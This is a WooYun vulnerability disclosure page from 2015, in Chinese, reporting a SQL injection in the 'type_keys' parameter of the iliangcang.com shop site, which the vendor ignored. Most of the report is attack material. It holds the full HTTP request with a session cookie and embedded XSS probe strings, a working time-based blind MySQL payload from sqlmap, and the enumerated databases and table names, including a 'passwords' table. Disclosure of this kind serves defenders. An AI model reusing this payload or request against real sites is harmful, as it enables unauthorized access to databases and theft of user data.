当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142381

漏洞标题:良仓官网SQL注入漏洞

相关厂商:www.iliangcang.com

漏洞作者: xunnun

提交时间:2015-09-21 23:09

修复时间:2015-09-26 23:10

公开时间:2015-09-26 23:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

GET /i/goods/?act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1,1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.iliangcang.com:80/
Cookie: PHPSESSID=ng7n8q9f3cjhu90sgc9f2fhm34; CNZZDATA1255589131=1820958677-1442496092-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1442496092; Hm_lvt_e1ff3456921b2853f7a913e1b4d776c0=1442501718,1442501963,1442502082,1442502323; Hm_lpvt_e1ff3456921b2853f7a913e1b4d776c0=1442502323; HMACCOUNT=2BF61C215E56F16E; looyu_id=674639192215e9e691bb2fb801024e6986_53645%3A1; looyu_53645=v%3A674639192215e9e691bb2fb801024e6986%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m188.looyu.com/monitor; _jzqco=%7C%7C%7C%7C%7C1.1235655964.1442499463200.1442501593179.1442502323250.1442501593179.1442502323250.0.0.0.7.7; __utmt=1; __utma=248775135.1341662073.1442499463.1442499463.1442499463.1; __utmb=248775135.6.10.1442499463; __utmc=248775135; __utmz=248775135.1442499463.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); MECHAT_LVTime=1442502323318; MECHAT_CKID=cookieVal=006600144249962600255771; MECHAT-OLDFRIEND=true
Host: www.iliangcang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


type_keys参数存在注入

sqlmap identified the following injection point(s) with a total of 152 HTTP(s) requests:
---
Parameter: type_keys (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ
---
web application technology: PHP 5.5.23
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: type_keys (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ
---
web application technology: PHP 5.5.23
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] jliangcang
[*] test


back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] jliangcang
[*] test
Database: jliangcang
[35 tables]
+-----------------------+
| CPG_filetypes |
| ClassificationNode |
| DEPT |
| EPIXEIRISI |
| Economy |
| ORDERS |
| ORDERSTATUS |
| SALES |
| Parameter |
| session |
| bombing |
| business |
| companies |
| cv_pests_diseases |
| dtb_send_history |
| e107_user |
| experimental_data_set |
| ezin_users |
| help_topic |
| identification |
| item_master_seq |
| medicalprocedure |
| mushroom_test_results |
| object |
| passwords |
| pricegroup |
| principal |
| queries |
| records |
| region |
| tag |
| tbl_event |
| tf_settings |
| userlist |
| vendor_types |
+-----------------------+


漏洞证明:

back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] jliangcang
[*] test
Database: jliangcang
[35 tables]
+-----------------------+
| CPG_filetypes |
| ClassificationNode |
| DEPT |
| EPIXEIRISI |
| Economy |
| ORDERS |
| ORDERSTATUS |
| SALES |
| Parameter |
| session |
| bombing |
| business |
| companies |
| cv_pests_diseases |
| dtb_send_history |
| e107_user |
| experimental_data_set |
| ezin_users |
| help_topic |
| identification |
| item_master_seq |
| medicalprocedure |
| mushroom_test_results |
| object |
| passwords |
| pricegroup |
| principal |
| queries |
| records |
| region |
| tag |
| tbl_event |
| tf_settings |
| userlist |
| vendor_types |
+-----------------------+

修复方案:

版权声明:转载请注明来源 xunnun@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-26 23:10

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无